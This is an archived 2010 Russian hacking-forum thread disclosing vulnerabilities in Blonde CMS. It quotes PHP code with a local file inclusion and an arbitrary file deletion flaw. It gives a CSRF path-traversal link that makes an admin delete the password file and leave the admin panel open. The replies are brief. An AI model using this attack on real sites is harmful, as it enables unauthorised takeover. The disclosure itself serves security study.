Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Blonde CMS

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> Blonde CMS
Имя
Сообщение << Старые топики   Новые топики >>
Blonde CMS - 2010-01-23 01:20:40.416666   
S00pY

Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
/*****************************************/
// Название: Blonde CMS
// Версия: beta
// Автор Гриня (Uhty) Россия !!! 2002 год
// Подправлен к современным условиям Титов Андрей, Дмитрий Камаев
// Дата выпуска: 25 июня 2009 года
// Лицензия: Free
// URL: BlondeCMS.ru
// Услуги $: Доработка CMS под ваши нужды, создание скриптов, CMS на заказ
/******************************************/

LFI
Требуеться:MQ=OFF
Сценарий index.php

. . . . . . . . . . if (isset($_GET ['id'])) { $id = $_GET ['id']; } else { $id = $index; } if (file_exists ("engine/content/" . $id . ".php")) { include ("engine/content/" . $id . ".php"); } else { include ('engine/404.html'); exit; } . . . . . . . . . . Подключаються файлы с раширением "php",обрезать расширение можно одним из известных нам способов.

Удаление произвольного файла с правами админа
admin_delete.php

if(!isset($_GET['id'])) die('Не задана страница для удаления'); if(unlink('../engine/content/'.$_GET['id'].'.php')) { echo 'Страница '.$_GET['id'].' удалена.&lt;br&gt;';
CSRF
Просим админа перейти на сцыль admin/admin_delete.php?id=../../admin/passw
получаем админку с пустым логином и паролем…
Post #: 1
RE: Blonde CMS - 2010-01-25 09:29:01.270000   
Pupkin-Zade

Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
Название хорошее :)
Post #: 2
RE: Blonde CMS - 2010-01-25 10:06:10.833333   
Stil Free 2

Сообщений: 183
Оценки: 0
Присоединился: 2009-03-26 17:17:38.296666
Да и стиль в формате гламура:)
Post #: 3
RE: Blonde CMS - 2010-02-18 22:14:58.446666   
NEWS

Сообщений: 224
Оценки: 0
Присоединился: 2009-11-18 10:40:28.283333
Большое спасибо ! но мне выдало ошибку ….
Post #: 4
RE: Blonde CMS - 2010-04-19 11:43:23.200000   
DePutaMadre

Сообщений: 877
Оценки: 0
Присоединился: 2010-03-30 17:33:53.833333
также ошибка детектед (((
Post #: 5
Страниц:  [1]
Все форумы >> [Уязвимости] >> Blonde CMS







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.